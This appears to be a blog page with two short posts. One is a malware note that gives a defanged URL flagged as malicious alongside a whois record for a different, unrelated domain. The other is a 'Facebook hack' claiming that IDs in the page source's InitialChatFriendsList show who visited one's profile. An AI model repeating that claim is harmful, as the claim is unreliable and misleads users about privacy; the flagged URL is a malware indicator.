In the process of analysis I came across “h00p://golf2day[dot]com/wnqe.html” but I am not be able to confirm why it is malecious or being declared malicious by browser as it was be asking for some ID pass and creating a secure connection.

 

Anyhow let’s see the domain and whois of this domain

whois 3d-game.com

  Domain Name: 3D-GAME.COM

  Registrar: DNC HOLDINGS, INC.

  Whois Server: whois.directnic.com

  Referral URL: http://www.directnic.com

  Name Server: NS1.DTDNS.COM

  Name Server: NS2.DTDNS.COM

  Name Server: NS3.DTDNS.COM

  Status: clientDeleteProhibited

  Status: clientTransferProhibited

  Status: clientUpdateProhibited

  Updated Date: 03-oct-2012

  Creation Date: 13-apr-2003

  Expiration Date: 13-apr-2014

Registrant:North Loop Networks

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Domain Name: 3D-GAME.COM

 

Administrative Contact:

Manager, Hostmaster hostmaster@northloopnetworks.com

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Technical Contact:Manager, Hostmaster hostmaster@northloopnetworks.com

1807 3rd st ne

Minneapolis, MN 55418

US

612 385 5501

Record last updated 03-02-2011 12:39:17 PM

Record expires on 04-13-2014

Record created on 04-13-2003

 Domain servers in listed order:

NS1.DTDNS.COM 64.156.29.49

NS2.DTDNS.COM 67.228.106.194

NS3.DTDNS.COM 75.126.80.224


#MalwareMustDie

Facebook Hack, Who visited your profile.

2 Comments

It’s a simple Facebook Hack nothing like some Privacy leak or something so I am not expecting any Death threats, Because of this. If you are still interested in sending some of those then send me over my personal ID not over my official one 😉

You Don’t have to give nay permission or to install anything, simply just try this over your browser and nothing like information leak. It just got 5 very simple steps.
1) Log in to your Facebook: I hope this is something very simple and need no explanation.

2) View Source or use this link “view-source:www.facebook.com” : this is something very simple, if not simple then go to your facebook right click and view source code.

3)Search for “InitialChatFriendsList” : After going in your source code prss (ctrl+f) and search this string.
4)Right after this keyword you will see {“list”[“1111111111″,”2222222222″,…,”9999999999”]} : You going to see a string like this just after what you have searched and that will be having some random numbers.

5)Replace X with Id to view the person profile www.facebook.com/XXXXXXXXXX and see the person who visited your profile.

I hope this is pretty Simple, Post your comments.

 

Regards

Unknown_had

Older Entries